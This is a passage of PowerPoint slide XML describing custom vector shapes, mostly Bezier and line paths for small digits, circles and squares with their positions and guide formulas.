                    <a:gd name="T1" fmla="*/ 8 h 34"/>
                    <a:gd name="T2" fmla="*/ 1 w 22"/>
                    <a:gd name="T3" fmla="*/ 8 h 34"/>
                    <a:gd name="T4" fmla="*/ 4 w 22"/>
                    <a:gd name="T5" fmla="*/ 2 h 34"/>
                    <a:gd name="T6" fmla="*/ 10 w 22"/>
                    <a:gd name="T7" fmla="*/ 0 h 34"/>
                    <a:gd name="T8" fmla="*/ 15 w 22"/>
                    <a:gd name="T9" fmla="*/ 1 h 34"/>
                    <a:gd name="T10" fmla="*/ 19 w 22"/>
                    <a:gd name="T11" fmla="*/ 4 h 34"/>
                    <a:gd name="T12" fmla="*/ 20 w 22"/>
                    <a:gd name="T13" fmla="*/ 8 h 34"/>
                    <a:gd name="T14" fmla="*/ 16 w 22"/>
                    <a:gd name="T15" fmla="*/ 15 h 34"/>
                    <a:gd name="T16" fmla="*/ 19 w 22"/>
                    <a:gd name="T17" fmla="*/ 18 h 34"/>
                    <a:gd name="T18" fmla="*/ 22 w 22"/>
                    <a:gd name="T19" fmla="*/ 24 h 34"/>
                    <a:gd name="T20" fmla="*/ 20 w 22"/>
                    <a:gd name="T21" fmla="*/ 29 h 34"/>
                    <a:gd name="T22" fmla="*/ 16 w 22"/>
                    <a:gd name="T23" fmla="*/ 33 h 34"/>
                    <a:gd name="T24" fmla="*/ 10 w 22"/>
                    <a:gd name="T25" fmla="*/ 34 h 34"/>
                    <a:gd name="T26" fmla="*/ 3 w 22"/>
                    <a:gd name="T27" fmla="*/ 32 h 34"/>
                    <a:gd name="T28" fmla="*/ 0 w 22"/>
                    <a:gd name="T29" fmla="*/ 25 h 34"/>
                    <a:gd name="T30" fmla="*/ 3 w 22"/>
                    <a:gd name="T31" fmla="*/ 25 h 34"/>
                    <a:gd name="T32" fmla="*/ 5 w 22"/>
                    <a:gd name="T33" fmla="*/ 29 h 34"/>
                    <a:gd name="T34" fmla="*/ 10 w 22"/>
                    <a:gd name="T35" fmla="*/ 31 h 34"/>
                    <a:gd name="T36" fmla="*/ 16 w 22"/>
                    <a:gd name="T37" fmla="*/ 29 h 34"/>
                    <a:gd name="T38" fmla="*/ 18 w 22"/>
                    <a:gd name="T39" fmla="*/ 24 h 34"/>
                    <a:gd name="T40" fmla="*/ 17 w 22"/>
                    <a:gd name="T41" fmla="*/ 20 h 34"/>
                    <a:gd name="T42" fmla="*/ 14 w 22"/>
                    <a:gd name="T43" fmla="*/ 18 h 34"/>
                    <a:gd name="T44" fmla="*/ 9 w 22"/>
                    <a:gd name="T45" fmla="*/ 17 h 34"/>
                    <a:gd name="T46" fmla="*/ 9 w 22"/>
                    <a:gd name="T47" fmla="*/ 14 h 34"/>
                    <a:gd name="T48" fmla="*/ 13 w 22"/>
                    <a:gd name="T49" fmla="*/ 13 h 34"/>
                    <a:gd name="T50" fmla="*/ 15 w 22"/>
                    <a:gd name="T51" fmla="*/ 11 h 34"/>
                    <a:gd name="T52" fmla="*/ 16 w 22"/>
                    <a:gd name="T53" fmla="*/ 8 h 34"/>
                    <a:gd name="T54" fmla="*/ 15 w 22"/>
                    <a:gd name="T55" fmla="*/ 4 h 34"/>
                    <a:gd name="T56" fmla="*/ 10 w 22"/>
                    <a:gd name="T57" fmla="*/ 3 h 34"/>
                    <a:gd name="T58" fmla="*/ 7 w 22"/>
                    <a:gd name="T59" fmla="*/ 4 h 34"/>
                    <a:gd name="T60" fmla="*/ 4 w 22"/>
                    <a:gd name="T61" fmla="*/ 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 h="34">
                      <a:moveTo>
                        <a:pt x="4" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="8"/>
                        <a:pt x="1" y="8"/>
                        <a:pt x="1" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="5"/>
                        <a:pt x="2" y="3"/>
                        <a:pt x="4" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="10" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="0"/>
                        <a:pt x="14" y="0"/>
                        <a:pt x="15" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="18" y="3"/>
                        <a:pt x="19" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="5"/>
                        <a:pt x="20" y="7"/>
                        <a:pt x="20" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="11"/>
                        <a:pt x="18" y="13"/>
                        <a:pt x="16" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="16"/>
                        <a:pt x="18" y="16"/>
                        <a:pt x="19" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="19"/>
                        <a:pt x="22" y="21"/>
                        <a:pt x="22" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="25"/>
                        <a:pt x="21" y="27"/>
                        <a:pt x="20" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="31"/>
                        <a:pt x="18" y="32"/>
                        <a:pt x="16" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="34"/>
                        <a:pt x="12" y="34"/>
                        <a:pt x="10" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="34"/>
                        <a:pt x="5" y="33"/>
                        <a:pt x="3" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="30"/>
                        <a:pt x="0" y="28"/>
                        <a:pt x="0" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="25"/>
                        <a:pt x="3" y="25"/>
                        <a:pt x="3" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="27"/>
                        <a:pt x="4" y="28"/>
                        <a:pt x="5" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="30"/>
                        <a:pt x="8" y="31"/>
                        <a:pt x="10" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="31"/>
                        <a:pt x="15" y="30"/>
                        <a:pt x="16" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="27"/>
                        <a:pt x="18" y="26"/>
                        <a:pt x="18" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="23"/>
                        <a:pt x="18" y="21"/>
                        <a:pt x="17" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="19"/>
                        <a:pt x="16" y="18"/>
                        <a:pt x="14" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="17"/>
                        <a:pt x="11" y="17"/>
                        <a:pt x="9" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="14"/>
                        <a:pt x="12" y="13"/>
                        <a:pt x="13" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="12"/>
                        <a:pt x="15" y="12"/>
                        <a:pt x="15" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="10"/>
                        <a:pt x="16" y="9"/>
                        <a:pt x="16" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="7"/>
                        <a:pt x="16" y="5"/>
                        <a:pt x="15" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="3"/>
                        <a:pt x="10" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="3"/>
                        <a:pt x="8" y="3"/>
                        <a:pt x="7" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="5"/>
                        <a:pt x="5" y="6"/>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205"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8977313" y="4668838"/>
                  <a:ext cx="2857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206"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9012238" y="4622801"/>
                  <a:ext cx="50800" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4 w 22"/>
                    <a:gd name="T1" fmla="*/ 11 h 33"/>
                    <a:gd name="T2" fmla="*/ 1 w 22"/>
                    <a:gd name="T3" fmla="*/ 11 h 33"/>
                    <a:gd name="T4" fmla="*/ 4 w 22"/>
                    <a:gd name="T5" fmla="*/ 3 h 33"/>
                    <a:gd name="T6" fmla="*/ 11 w 22"/>
                    <a:gd name="T7" fmla="*/ 0 h 33"/>
                    <a:gd name="T8" fmla="*/ 19 w 22"/>
                    <a:gd name="T9" fmla="*/ 3 h 33"/>
                    <a:gd name="T10" fmla="*/ 22 w 22"/>
                    <a:gd name="T11" fmla="*/ 10 h 33"/>
                    <a:gd name="T12" fmla="*/ 20 w 22"/>
                    <a:gd name="T13" fmla="*/ 15 h 33"/>
                    <a:gd name="T14" fmla="*/ 15 w 22"/>
                    <a:gd name="T15" fmla="*/ 21 h 33"/>
                    <a:gd name="T16" fmla="*/ 7 w 22"/>
                    <a:gd name="T17" fmla="*/ 30 h 33"/>
                    <a:gd name="T18" fmla="*/ 22 w 22"/>
                    <a:gd name="T19" fmla="*/ 30 h 33"/>
                    <a:gd name="T20" fmla="*/ 22 w 22"/>
                    <a:gd name="T21" fmla="*/ 33 h 33"/>
                    <a:gd name="T22" fmla="*/ 0 w 22"/>
                    <a:gd name="T23" fmla="*/ 33 h 33"/>
                    <a:gd name="T24" fmla="*/ 12 w 22"/>
                    <a:gd name="T25" fmla="*/ 20 h 33"/>
                    <a:gd name="T26" fmla="*/ 17 w 22"/>
                    <a:gd name="T27" fmla="*/ 14 h 33"/>
                    <a:gd name="T28" fmla="*/ 18 w 22"/>
                    <a:gd name="T29" fmla="*/ 10 h 33"/>
                    <a:gd name="T30" fmla="*/ 16 w 22"/>
                    <a:gd name="T31" fmla="*/ 5 h 33"/>
                    <a:gd name="T32" fmla="*/ 11 w 22"/>
                    <a:gd name="T33" fmla="*/ 3 h 33"/>
                    <a:gd name="T34" fmla="*/ 6 w 22"/>
                    <a:gd name="T35" fmla="*/ 5 h 33"/>
                    <a:gd name="T36" fmla="*/ 4 w 22"/>
                    <a:gd name="T37" fmla="*/ 1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33">
                      <a:moveTo>
                        <a:pt x="4" y="11"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="11"/>
                        <a:pt x="1" y="11"/>
                        <a:pt x="1" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="8"/>
                        <a:pt x="2" y="5"/>
                        <a:pt x="4" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="1"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="11" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="0"/>
                        <a:pt x="17" y="1"/>
                        <a:pt x="19" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="5"/>
                        <a:pt x="22" y="7"/>
                        <a:pt x="22" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="11"/>
                        <a:pt x="21" y="13"/>
                        <a:pt x="20" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="16"/>
                        <a:pt x="18" y="19"/>
                        <a:pt x="15" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="30"/>
                        <a:pt x="7" y="30"/>
                        <a:pt x="7" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="30"/>
                        <a:pt x="22" y="30"/>
                        <a:pt x="22" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="33"/>
                        <a:pt x="22" y="33"/>
                        <a:pt x="22" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="33"/>
                        <a:pt x="0" y="33"/>
                        <a:pt x="0" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="20"/>
                        <a:pt x="12" y="20"/>
                        <a:pt x="12" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="17"/>
                        <a:pt x="16" y="15"/>
                        <a:pt x="17" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="12"/>
                        <a:pt x="18" y="11"/>
                        <a:pt x="18" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="8"/>
                        <a:pt x="18" y="6"/>
                        <a:pt x="16" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="3"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="11" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="3"/>
                        <a:pt x="7" y="4"/>
                        <a:pt x="6" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="6"/>
                        <a:pt x="4" y="8"/>
                        <a:pt x="4"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207"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9070975" y="4624388"/>
                  <a:ext cx="66675" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 42"/>
                    <a:gd name="T1" fmla="*/ 0 h 47"/>
                    <a:gd name="T2" fmla="*/ 5 w 42"/>
                    <a:gd name="T3" fmla="*/ 0 h 47"/>
                    <a:gd name="T4" fmla="*/ 21 w 42"/>
                    <a:gd name="T5" fmla="*/ 36 h 47"/>
                    <a:gd name="T6" fmla="*/ 37 w 42"/>
                    <a:gd name="T7" fmla="*/ 0 h 47"/>
                    <a:gd name="T8" fmla="*/ 42 w 42"/>
                    <a:gd name="T9" fmla="*/ 0 h 47"/>
                    <a:gd name="T10" fmla="*/ 21 w 42"/>
                    <a:gd name="T11" fmla="*/ 47 h 47"/>
                    <a:gd name="T12" fmla="*/ 20 w 42"/>
                    <a:gd name="T13" fmla="*/ 47 h 47"/>
                    <a:gd name="T14" fmla="*/ 0 w 42"/>
                    <a:gd name="T15" fmla="*/ 0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7">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="5" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20" y="4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208"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9301163" y="4695826"/>
                  <a:ext cx="92075" cy="96838"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 58 w 58"/>
                    <a:gd name="T1" fmla="*/ 61 h 61"/>
                    <a:gd name="T2" fmla="*/ 0 w 58"/>
                    <a:gd name="T3" fmla="*/ 61 h 61"/>
                    <a:gd name="T4" fmla="*/ 0 w 58"/>
                    <a:gd name="T5" fmla="*/ 0 h 61"/>
                    <a:gd name="T6" fmla="*/ 58 w 58"/>
                    <a:gd name="T7" fmla="*/ 0 h 61"/>
                    <a:gd name="T8" fmla="*/ 58 w 58"/>
                    <a:gd name="T9" fmla="*/ 61 h 61"/>
                    <a:gd name="T10" fmla="*/ 1 w 58"/>
                    <a:gd name="T11" fmla="*/ 60 h 61"/>
                    <a:gd name="T12" fmla="*/ 57 w 58"/>
                    <a:gd name="T13" fmla="*/ 60 h 61"/>
                    <a:gd name="T14" fmla="*/ 57 w 58"/>
                    <a:gd name="T15" fmla="*/ 2 h 61"/>
                    <a:gd name="T16" fmla="*/ 1 w 58"/>
                    <a:gd name="T17" fmla="*/ 2 h 61"/>
                    <a:gd name="T18" fmla="*/ 1 w 58"/>
                    <a:gd name="T19"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61">
                      <a:moveTo>
                        <a:pt x="58" y="61"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="61"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="60"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="57" y="60"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1"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209"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9305925" y="4703763"/>
                  <a:ext cx="82550" cy="82550"/>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 h 36"/>
                    <a:gd name="T12" fmla="*/ 1 w 36"/>
                    <a:gd name="T13" fmla="*/ 18 h 36"/>
                    <a:gd name="T14" fmla="*/ 18 w 36"/>
                    <a:gd name="T15" fmla="*/ 35 h 36"/>
                    <a:gd name="T16" fmla="*/ 35 w 36"/>
                    <a:gd name="T17" fmla="*/ 18 h 36"/>
                    <a:gd name="T18" fmla="*/ 18 w 36"/>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1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="1"/>
                        <a:pt x="1" y="9"/>
                        <a:pt x="1" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="27"/>
                        <a:pt x="9" y="35"/>
                        <a:pt x="18" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="35"/>
                        <a:pt x="35" y="27"/>
                        <a:pt x="35" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="9"/>
                        <a:pt x="27" y="1"/>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210"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9312275" y="4710113"/>
                  <a:ext cx="69850" cy="69850"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 30"/>
                    <a:gd name="T1" fmla="*/ 30 h 30"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 15 h 30"/>
                    <a:gd name="T4" fmla="*/ 15 w 30"/>
                    <a:gd name="T5" fmla="*/ 0 h 30"/>
                    <a:gd name="T6" fmla="*/ 30 w 30"/>
                    <a:gd name="T7" fmla="*/ 15 h 30"/>
                    <a:gd name="T8" fmla="*/ 15 w 30"/>
                    <a:gd name="T9" fmla="*/ 30 h 30"/>
                    <a:gd name="T10" fmla="*/ 15 w 30"/>
                    <a:gd name="T11" fmla="*/ 1 h 30"/>
                    <a:gd name="T12" fmla="*/ 1 w 30"/>
                    <a:gd name="T13" fmla="*/ 15 h 30"/>
                    <a:gd name="T14" fmla="*/ 15 w 30"/>
                    <a:gd name="T15" fmla="*/ 29 h 30"/>
                    <a:gd name="T16" fmla="*/ 29 w 30"/>
                    <a:gd name="T17" fmla="*/ 15 h 30"/>
                    <a:gd name="T18" fmla="*/ 15 w 30"/>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30"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="30"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="0" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="0"/>
                        <a:pt x="30" y="7"/>
                        <a:pt x="30" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="23"/>
                        <a:pt x="23" y="30"/>
                        <a:pt x="15" y="30"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="15" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="23"/>
                        <a:pt x="7" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="29"/>
                        <a:pt x="29" y="23"/>
                        <a:pt x="29" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="7"/>
                        <a:pt x="23" y="1"/>
                        <a:pt x="1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211"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9301163" y="4695826"/>
                  <a:ext cx="49213" cy="96838"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 31"/>
                    <a:gd name="T1" fmla="*/ 61 h 61"/>
                    <a:gd name="T2" fmla="*/ 0 w 31"/>
                    <a:gd name="T3" fmla="*/ 60 h 61"/>
                    <a:gd name="T4" fmla="*/ 28 w 31"/>
                    <a:gd name="T5" fmla="*/ 31 h 61"/>
                    <a:gd name="T6" fmla="*/ 0 w 31"/>
                    <a:gd name="T7" fmla="*/ 2 h 61"/>
                    <a:gd name="T8" fmla="*/ 1 w 31"/>
                    <a:gd name="T9" fmla="*/ 0 h 61"/>
                    <a:gd name="T10" fmla="*/ 31 w 31"/>
                    <a:gd name="T11" fmla="*/ 31 h 61"/>
                    <a:gd name="T12" fmla="*/ 29 w 31"/>
                    <a:gd name="T13" fmla="*/ 31 h 61"/>
                    <a:gd name="T14" fmla="*/ 1 w 31"/>
                    <a:gd name="T15" fmla="*/ 61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61">
                      <a:moveTo>
                        <a:pt x="1" y="61"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="60"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1"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212"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9412288" y="4703763"/>
                  <a:ext cx="82550" cy="82550"/>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 h 36"/>
                    <a:gd name="T12" fmla="*/ 1 w 36"/>
                    <a:gd name="T13" fmla="*/ 18 h 36"/>
                    <a:gd name="T14" fmla="*/ 18 w 36"/>
                    <a:gd name="T15" fmla="*/ 35 h 36"/>
                    <a:gd name="T16" fmla="*/ 35 w 36"/>
                    <a:gd name="T17" fmla="*/ 18 h 36"/>
                    <a:gd name="T18" fmla="*/ 18 w 36"/>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1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="1"/>
                        <a:pt x="1" y="9"/>
                        <a:pt x="1" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="27"/>
                        <a:pt x="9" y="35"/>
                        <a:pt x="18" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="35"/>
                        <a:pt x="35" y="27"/>
                        <a:pt x="35" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="9"/>
                        <a:pt x="27" y="1"/>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213"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9437688" y="4729163"/>
                  <a:ext cx="34925" cy="31750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 7 w 15"/>
                    <a:gd name="T1" fmla="*/ 14 h 14"/>
                    <a:gd name="T2" fmla="*/ 0 w 15"/>
                    <a:gd name="T3" fmla="*/ 7 h 14"/>
                    <a:gd name="T4" fmla="*/ 7 w 15"/>
                    <a:gd name="T5" fmla="*/ 0 h 14"/>
                    <a:gd name="T6" fmla="*/ 15 w 15"/>
                    <a:gd name="T7" fmla="*/ 7 h 14"/>
                    <a:gd name="T8" fmla="*/ 7 w 15"/>
                    <a:gd name="T9" fmla="*/ 14 h 14"/>
                    <a:gd name="T10" fmla="*/ 7 w 15"/>
                    <a:gd name="T11" fmla="*/ 1 h 14"/>
                    <a:gd name="T12" fmla="*/ 1 w 15"/>
                    <a:gd name="T13" fmla="*/ 7 h 14"/>
                    <a:gd name="T14" fmla="*/ 7 w 15"/>
                    <a:gd name="T15" fmla="*/ 13 h 14"/>
                    <a:gd name="T16" fmla="*/ 14 w 15"/>
                    <a:gd name="T17" fmla="*/ 7 h 14"/>
                    <a:gd name="T18" fmla="*/ 7 w 15"/>
                    <a:gd name="T19"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7" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="14"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="3"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="15" y="3"/>
                        <a:pt x="15" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="11"/>
                        <a:pt x="11" y="14"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="7" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="11"/>
                        <a:pt x="4" y="13"/>
                        <a:pt x="7" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="13"/>
                        <a:pt x="14" y="11"/>
                        <a:pt x="14" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="3"/>
                        <a:pt x="11" y="1"/>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214"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9513888" y="4695826"/>
                  <a:ext cx="92075" cy="96838"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 58 w 58"/>
                    <a:gd name="T1" fmla="*/ 61 h 61"/>
                    <a:gd name="T2" fmla="*/ 0 w 58"/>
                    <a:gd name="T3" fmla="*/ 61 h 61"/>
                    <a:gd name="T4" fmla="*/ 0 w 58"/>
                    <a:gd name="T5" fmla="*/ 0 h 61"/>
                    <a:gd name="T6" fmla="*/ 58 w 58"/>
                    <a:gd name="T7" fmla="*/ 0 h 61"/>
                    <a:gd name="T8" fmla="*/ 58 w 58"/>
                    <a:gd name="T9" fmla="*/ 61 h 61"/>
                    <a:gd name="T10" fmla="*/ 1 w 58"/>
                    <a:gd name="T11" fmla="*/ 60 h 61"/>
                    <a:gd name="T12" fmla="*/ 58 w 58"/>
